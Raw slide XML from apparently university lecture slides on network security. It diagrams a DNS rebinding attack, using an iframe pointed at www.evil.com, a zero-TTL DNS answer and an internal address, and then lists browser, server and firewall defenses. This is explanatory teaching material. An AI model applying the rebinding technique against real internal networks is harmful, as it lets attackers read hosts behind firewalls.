                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DNSSEC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DDoS</a:t>
            </a:r>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solidFill>
                  <a:srgbClr val="696464"/>
                </a:solidFill>
                <a:latin typeface="Perpetua"/>
              </a:rPr>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2235724" y="6210300"/>
            <a:ext cx="478808" cy="381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752600" y="152400"/>
            <a:ext cx="7772400" cy="731838"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DNS Rebinding Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="621571" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="5638800"/>
            <a:ext cx="5334000" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:sym typeface="Symbol" charset="0"/>
              </a:rPr>
              <a:t>Read permitted: it’s the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:sym typeface="Symbol" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:sym typeface="Symbol" charset="0"/>
              </a:rPr>
              <a:t>same origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:sym typeface="Symbol" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="58372" name="Picture 4"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5000" y="2209800"/>
            <a:ext cx="1119188"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373" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="2209800"/>
            <a:ext cx="533400" cy="3352800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF3300"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert" wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Firewall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58374" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8305800" y="4038600"/>
            <a:ext cx="19050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Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>www.evil.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>web server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58375" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8305800" y="2438400"/>
            <a:ext cx="19812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Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ns.evil.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DNS server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58376" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8540750" y="5029200"/>
            <a:ext cx="13879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171.64.7.115</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 17"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="2209800"/>
            <a:ext cx="4953000" cy="400050"/>
            <a:chOff x="960" y="1392"/>
            <a:chExt cx="3120" cy="252"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58393" name="Line 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="960" y="1632"/>
              <a:ext cx="312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latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58394" name="Text Box 12"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2544" y="1392"/>
              <a:ext cx="112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a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>www.evil.com?</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58378" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="4495800"/>
            <a:ext cx="1752600" cy="990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New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>corporate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>web server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 18"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="2727325"/>
            <a:ext cx="5029200" cy="400050"/>
            <a:chOff x="960" y="1824"/>
            <a:chExt cx="3168" cy="252"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58391" name="Line 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="960" y="1872"/>
              <a:ext cx="316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latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58392" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2279" y="1824"/>
              <a:ext cx="158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171.64.7.115</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Gulim" charset="0"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Gulim" charset="0"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>TTL = 0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="621584" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2743200" y="3505200"/>
            <a:ext cx="5334000" cy="9906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latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="621587" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1905000" y="1371601"/>
            <a:ext cx="482439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iframe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http://www.evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58382" name="Text Box 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="5486400"/>
            <a:ext cx="15119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192.168.0.100</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 21"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="3260725"/>
            <a:ext cx="5029200" cy="400050"/>
            <a:chOff x="960" y="1824"/>
            <a:chExt cx="3168" cy="252"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58389" name="Line 22"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="960" y="1872"/>
              <a:ext cx="316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latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58390" name="Text Box 23"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2548" y="1824"/>
              <a:ext cx="104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192.168.0.100</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="621592" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="3352800"/>
            <a:ext cx="0" cy="11430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latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58385" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8534401" y="6248400"/>
            <a:ext cx="187743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dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>[DWF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>96, R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>01]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58386" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3565525" y="6056313"/>
            <a:ext cx="184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endParaRPr lang="en-US" sz="1800">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8001000" y="1524000"/>
            <a:ext cx="2667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pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DNS-SEC cannot </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="hlink"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>stop this attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1360922" name="AutoShape 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8077200" y="3048001"/>
            <a:ext cx="533400" cy="506413"/>
          </a:xfrm>
          <a:prstGeom prst="star5">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF2F"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Footer Placeholder 26"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>FAST-NUCES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Picture 27" descr="http://study.result.pk/wp-content/uploads/2011/07/National-University-of-Computer-and-Emerging-Sciences-NUCES-300x300.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"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68481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158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6215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Left)">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffec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1592"/>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360922"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1360922"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1360922"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1360922"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="90"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="136092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621571">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>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P spid="621571" grpId="1" build="p"/>
      <p:bldP spid="621584" grpId="0" animBg="1"/>
      <p:bldP spid="621587" grpId="0"/>
      <p:bldP spid="621592" grpId="0" animBg="1"/>
      <p:bldP spid="5" grpId="0" build="p"/>
      <p:bldP spid="13609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828800" y="304800"/>
            <a:ext cx="7772400" cy="579438"/>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DNS Rebinding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Gulim" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59395" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="1143000"/>
            <a:ext cx="8305800" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Browser mitigation: DNS Pinning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Refuse to switch to a new IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Interacts poorly with proxies, VPN, dynamic DNS, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Not consistently implemented in any browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Server-side defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Check Host header for unrecognized domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Authenticate users with something other than IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Firewall defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>External names can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
